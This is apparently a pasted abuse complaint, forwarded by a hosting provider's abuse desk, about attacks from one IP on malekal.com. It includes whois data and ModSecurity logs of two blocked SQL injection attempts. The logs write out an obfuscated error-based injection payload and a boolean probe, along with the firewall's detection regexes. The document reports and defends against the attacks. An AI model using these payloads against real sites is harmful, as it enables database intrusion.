Untitled

a guest
May 29th, 2015

We have received the abuse complaint regarding the ATTACK. Please check it and take the necessary actions on it.

Thanks.

==========================================================

ed e-mail to inform you of an abuse complaint **

ABUSE TYPE: ATTACK

IP: 85.17.73.12


Dear customer,

This message is to inform you we received a complaint regarding
an IP assigned to you. Please see the complaint at the bottom
of this e-mail. We urge you to take appropriate action to prevent
future complaints.

Please note: the complaint has been processed by an automated system.
If you feel the complaint is invalid, please contact the complainant.

Failure to take action might result in an IP block of the mentioned IP.

Kind regards,

LeaseWeb Netherlands B.V. - Abuse Desk


***** ADDITIONAL INFORMATION BY SIRT *****
******************************************
ORIGINAL COMPLAINT BELOW
******************************************

Hello,
This is an automatically generated email,

=== Fri, 29 May 2015 20:38:50 +0200
9 attacks from 85.17.73.12 have been detected against malekal.com (94.23.44.69)
More abuses for WYCT at: http://www.malekal.com/modsec/index.php?netname=WYCT
abuse mail: abuse@leaseweb.com
===

% This is the RIPE Database query service.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See http://www.ripe.net/db/support/db-terms-conditions.pdf

% Note: this output has been filtered.
% To receive output for a database update, use the "-B" flag.

% Information related to '85.17.73.0 - 85.17.73.63'

% Abuse contact for '85.17.73.0 - 85.17.73.63' is 'abuse@leaseweb.com'

inetnum: 85.17.73.0 - 85.17.73.63
netname: WYCT
descr: Aysima 1-10-2009
remarks: Please send email to "abuse@leaseweb.com" for complaints
remarks: regarding portscans, DoS attacks and spam.
country: NL
admin-c: LSW1-RIPE
tech-c: LSW1-RIPE
status: ASSIGNED PA
mnt-by: OCOM-MNT
created: 2011-11-01T11:27:42Z
last-modified: 2011-11-01T11:27:42Z
source: RIPE # Filtered

person: RIP Mean
address: P.O. Box 93054
address: 1090BB AMSTERDAM
address: Netherlands
phone: +31 20 3162880
fax-no: +31 20 3162890
abuse-mailbox: abuse@nl.leaseweb.com
nic-hdl: LSW1-RIPE
mnt-by: OCOM-MNT
created: 2005-06-07T14:36:03Z
last-modified: 2015-03-24T09:01:24Z
source: RIPE # Filtered

% Information related to '85.17.0.0/16AS16265'

route: 85.17.0.0/16
descr: LEASEWEB
origin: AS16265
remarks: LeaseWeb
mnt-by: OCOM-MNT
created: 2005-03-12T22:19:17Z
last-modified: 2007-07-10T14:06:02Z
source: RIPE # Filtered

% Information related to '85.17.0.0/16AS60781'

route: 85.17.0.0/16
descr: LEASEWEB
origin: AS60781
remarks: LeaseWeb
mnt-by: OCOM-MNT
created: 2014-03-11T15:21:15Z
last-modified: 2014-03-11T15:21:15Z
source: RIPE # Filtered

% This query was served by the RIPE Database Query Service version 1.79.2 (DB-4)




Some logs for 85.17.73.12
========================================
Matched Transaction for Search String (85.17.73.12)
========================================

========================================
Matched Transaction for Search String (29/May/2015)
========================================

--838f666c-A--
[29/May/2015:20:34:53 +0200] VWixTV4XLEUAACR1eK4AAAAB 94.23.44.69 7399 94.23.44.69 8080
--838f666c-B--
POST /modsec/index.php?ip=(%2f**%2fsElEcT+1+%2f**%2ffRoM(%2f**%2fsElEcT+count(*),%2f**%2fcOnCaT((%2f**%2fsElEcT(%2f**%2fsElEcT+%2f**%2fuNhEx(%2f**%2fhEx(%2f**%2fcOnCaT(0x217e21,0x4142433134355a5136324457514146504f4959434644,0x217e21))))+%2f**%2ffRoM+information_schema.%2f**%2ftAbLeS+%2f**%2flImIt+0,1),floor(rand(0)*2))x+%2f**%2ffRoM+information_schema.%2f**%2ftAbLeS+%2f**%2fgRoUp%2f**%2fbY+x)a) HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)
Referer: http://www.malekal.com/modsec/index.php?ip=(%2f**%2fsElEcT+1+%2f**%2ffRoM(%2f**%2fsElEcT+count(*),%2f**%2fcOnCaT((%2f**%2fsElEcT(%2f**%2fsElEcT+%2f**%2fuNhEx(%2f**%2fhEx(%2f**%2fcOnCaT(0x217e21,0x4142433134355a5136324457514146504f4959434644,0x217e21))))+%2f**%2ffRoM+information_schema.%2f**%2ftAbLeS+%2f**%2flImIt+0,1),floor(rand(0)*2))x+%2f**%2ffRoM+information_schema.%2f**%2ftAbLeS+%2f**%2fgRoUp%2f**%2fbY+x)a)
Content-Type: application/x-www-form-urlencoded
Host: www.malekal.com
Content-Length: 0
X-Forwarded-For: 85.17.73.12
Accept-Encoding: gzip
X-Varnish: 2014342074

--838f666c-C--

--838f666c-F--
HTTP/1.1 403 Forbidden
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 186
Content-Type: text/html; charset=iso-8859-1

--838f666c-E--
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /modsec/index.php
on this server.</p>
</body></html>

--838f666c-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\A|[^\\d])0x[a-f\\d]{3,}[a-f\\d]*)+" at ARGS:ip. [file "/etc/modsecurity/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: (0x217e21,0x4142433134355a5136324457514146504f4959434644,0x217e21 found within ARGS:ip: (/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT /**/uNhEx(/**/hEx(/**/cOnCaT(0x217e21,0x4142433134355a5136324457514146504f4959434644,0x217e21)))) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a)"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"]
Action: Intercepted (phase 2)
Apache-Handler: application/x-httpd-php
Stopwatch: 1432924493439313 2606 (- - -)
Stopwatch2: 1432924493439313 2606; combined=515, p1=131, p2=185, p3=0, p4=0, p5=169, sr=29, sw=30, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.6.6 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Server: Apache/2.2.22

--838f666c-Z--

========================================
Matched Transaction for Search String (85.17.73.12)
========================================

========================================
Matched Transaction for Search String (29/May/2015)
========================================

--838f666c-A--
[29/May/2015:20:34:53 +0200] VWixTV4XLEUAACR1eK8AAAAB 94.23.44.69 7399 94.23.44.69 8080
--838f666c-B--
POST /modsec/index.php?ip='0=A+and+1=1 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)
Referer: http://www.malekal.com/modsec/index.php?ip='0=A+and+1=1
Content-Type: application/x-www-form-urlencoded
Host: www.malekal.com
Content-Length: 0
X-Forwarded-For: 85.17.73.12
Accept-Encoding: gzip
X-Varnish: 2014342075

--838f666c-C--

--838f666c-F--
HTTP/1.1 403 Forbidden
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 186
Content-Type: text/html; charset=iso-8859-1

--838f666c-E--
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /modsec/index.php
on this server.</p>
</body></html>

--838f666c-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)\\b(?i:and)\\b\\s+(\\d{1,10}|'[^=]{1,10}')\\s*?[=]|\\b(?i:and)\\b\\s+(\\d{1,10}|'[^=]{1,10}')\\s*?[<>]|\\band\\b ?(?:\\d{1,10}|[\\'\"][^=]{1,10}[\\'\"]) ?[=<>]+|\\b(?i:and)\\b\\s+(\\d{1,10}|'[^=]{1,10}')" at ARGS:ip. [file "/etc/modsecurity/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: and 1= found within ARGS:ip: '0=A and 1=1"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"]
Action: Intercepted (phase 2)
Apache-Handler: application/x-httpd-php
Stopwatch: 1432924493554446 2160 (- - -)
Stopwatch2: 1432924493554446 2160; combined=381, p1=120, p2=112, p3=0, p4=0, p5=113, sr=30, sw=36, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.6.6 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Server: Apache/2.2.22

--838f666c-Z--

========================================
Matched Transaction for Search String (85.17.73.12)
========================================